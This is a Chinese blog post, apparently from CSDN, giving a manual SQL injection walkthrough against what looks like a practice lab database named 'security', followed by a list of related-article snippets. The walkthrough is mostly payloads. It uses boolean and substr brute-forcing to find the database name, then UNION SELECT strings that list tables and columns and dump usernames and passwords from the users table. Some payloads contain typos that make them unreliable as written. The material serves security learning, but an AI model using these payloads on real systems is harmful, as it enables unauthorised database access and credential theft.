SQL注入之获取数据库用户表数据

最新推荐文章于 2023-10-09 14:05:38 发布
最新推荐文章于 2023-10-09 14:05:38 发布
阅读量1.1k 收藏 3
点赞数 1
分类专栏: 网络安全 文章标签: 数据库 sql mysql 网络安全 web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59099375/article/details/129641048
版权

获取数据库名

方法一

  1. 首先通过加入and 1=1 语句发现可以将语句传入至后端数据库执行,判断存在注入点

  1. 通过length函数判断数据库名的长度 构造轮子:'and length(database())='8,发现长度为8

  1. 对数据库名抓包进行逐个字符爆破,构造轮子:’+and+substr(database(),&1$,8)+’$a& ,得到数据库名称为security

方法二

联合查询更方便查出数据库名-1’union select 1,database(),3--+

获取表名

  1. 接下来开始联合查询表名

4.1首先通过order by查询列数为3

4.2 构造轮子判断回显位 -1’ union select 1,2,3--+

开始查询表名

-1’union select 1,(select group_concat(table_name) from information_schema.tables where table_name()=’security’),3--+

获取字段名

  1. 得到表名开始查询字段依旧使用联合查询构造轮子:-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_name=`security'),3--+

获取数据

  1. 开始查询数据

-1' union select 1,(select group_concat(username,'--',password) from security.users),3--+

手握一瓶橘子汽水
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
自动SQL注入数据库接管工具
02-24
sqlmap 是一个开源渗透测试工具,可以自动执行检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它配备了强大的检测引擎、最终渗透测试仪的许多利基功能以及广泛的开关,包括数据库指纹、从数据库获取数据、访问底层文件系统以及通过输出在操作系统上执行命令。带外连接。
15分钟了解sql注入(一) union注入
贤鱼的博客
09-24 1820
union注入详细教程
Web安全SQL注入
01-21
一、什么是SQL注入SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQLSQL注入是指将Web页面的原URL、单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。当Web应用程序的开发人员对用户所输入的数据不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取数据库信息以及提权,此时称发生了SQL注入攻击。 二、举个简单的例子 Web页面的某个单项需要与后端服务器进行交互,用户输入的数据通过提交之后被后端解析到SELECT查询语句的WHERE字段后面,根据
SQL注入入门学习
qq_40637944的博客
11-25 792
SQL注入入门学习
SQL注入(查询注入)
m0_61974571的博客
10-12 1707
如果使用config的认证方式,则直接进入后台,如果为http,可以进行爆破,最好不要开启phpmyadmin,或者在需要的时候再开启远程登陆,修改/opt/lampp/etc/extra/http-xampp.conf文件禁用远程访问。使用方法:https://blog.csdn.net/kikajack/article/details/80065753。上述语法主要针对mysql数据库,如果针对其他数据库,需要使用其他数据库的语法。3、Web页面中有两个SQL查询语句,查询的列数不相同。
SQL注入
qq_63785498的博客
06-10 2038
SQL注入语句:1、1';-- -查看有哪些库2、1';-- -查看有哪些3、1';-- -查看里面有哪些字段4、1';-- -查看里面所有字段的内容。
SQl注入学习
weixin_42451330的博客
06-08 875
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节,像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节。
SQL注入之联合查询注入
qq_45691294的博客
07-11 6872
MySQL中的联合查询 联合查询是可合并多个相似的选择查询的结果集。等同于将一个追加到另一个,从而实现将两个的查询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个查询的结果合并到一起(纵向合并):字段数不变,多个查询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入是MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足查询的信息在前端有回显,回显数据
网络安全进阶学习第十课——MySQL手工注入
p36273的博客
08-02 1766
多了一列选项,由于正确就会执行sleep(1),所以相应时间最长的那一个就是正确的结果,这里就是14。这样就知道security这个数据库里面所有的名字:emails,referers,uagents,users。现在这样子就知道了users这个的所有字段名,假设知道了字段是:id,username,password。好了这样就知道所有的名字是:emails,referers,uagents,users。,这个函数第二个参数要是有特殊字符是会报错的,这里0x7e是“~”的URL编码。
sql注入资料.zip
最新发布
04-17
数据泄露:攻击者可以通过SQL注入获取数据库中的敏感信息,如用户密码、个人信息、财务数据等。 数据篡改:攻击者可以修改数据库中的数据,破坏数据的完整性和准确性。 系统控制:通过SQL注入,攻击者可能获得对...
案例分享:渗透攻防Web篇-深入浅出SQL注入
京东科技开发者
08-26 471
京东SRC(Security Response Center)收录大量外部白帽子提交的sql注入漏洞,漏洞发生的原因多为sql语句拼接和Mybatis使用不当导致。
SQL注入详解
热门推荐
qq_48904485的博客
03-21 1万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠查询、联合查询 、二次注入等等
SQL注入之储备知识数据库
weixin_44034479的博客
06-24 146
SQL:结构化查询语言(Structured Query Language)简称SQL。是一种特殊目的的编程语言,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统。 数据库的分类: SQL server 、 Mysql 、Oracal 、sqlite3 、DB2 、access等 数据库的使用: 进入mysql: msfadmin@metasploitable:~$ mysql -u root //-u :user -p :密码 mysql> show datab
不同数据库SQL注入不同手工注入方法的汇总
weixin_48421613的博客
06-10 1378
不同数据库的注入方式 以下资源部分为自己的理解,部分为墨者上面的解题思路,此处做的是汇总,由于不知墨者大佬的出处,故无法做出转载地址,所以此文归类为转载,若是墨者大佬在这里看到了属于你的文章,觉得我发不太好请及时联系我,我好做删除处理 Mysql手工注入 大家可以去看一下博客,有很详细的讲解如何进行sql注入 https://blog.csdn.net/weixin_48421613/article/details/107488560 https://blog.csdn.net/weixin_4842161
SQL注入--第二关详细讲解
MAY的博客
04-18 983
SQL命令插入到Web单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
漏洞篇(SQL注入一)
m0_58001548的博客
03-26 1027
此时我们输入的第一个单引号将 username 的单引号闭合,相当于输入了一个空用户,or 示左右两边只要有一边条件判断成立则该语句返回结果为真,其中 1=1 永远为真,所以当前 SQL 语句无论怎么执行结果永远为真,--空格示注释,注释后面所有代码不再执行。我们可以看到上面我们闭合的方法是没有输入用户名的,所以并不能成功登陆。
(学习笔记)SQL注入--基础篇
peanut5036的博客
02-16 1184
SQL注入自学笔记,适合小白,包括union注入,报错注入,与盲注
渗透测试----手把手教你SQL手工注入--(联合查询,报错注入)
weixin_52796034的博客
10-09 1203
报错注入是一种特殊的SQL注入攻击方式,它利用了应用程序对异常处理的不完善,通过在输入的SQL语句中插入恶意的SQL语句,达到获取未授权数据的目的。 在报错注入中,我们可以通过在输入的数据中插入SQL语句的异常字符,使得应用程序抛出异常,从而获取应用程序的错误信息。这些错误信息可能包含了应用程序的敏感数据,如数据库结构、列名、存储过程等。
达梦数据库sql注入
10-20
达梦数据库也存在SQL注入漏洞,如果使用该类数据库的站点存在SQL注入漏洞,用SQLmap等工具无法支持我们直接得到想要的数据,我们需要理解这些数据库的语法才能更好的进行手工注入。以下是一些达梦数据库的手工注入技巧: 1.注入点的判断:可以通过单引号、双引号、括号等特殊字符来判断是否存在注入点。 2.注入语句的构造:可以通过union、select、from等语句来构造注入语句。 3.获取数据库信息:可以通过查询系统或者使用一些特殊函数来获取数据库信息。 4.获取数据:可以通过查询或者使用一些特殊函数来获取数据。 总之,达梦数据库SQL注入和其他数据库的注入类似,需要理解其语法和特点,才能更好地进行手工注入。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值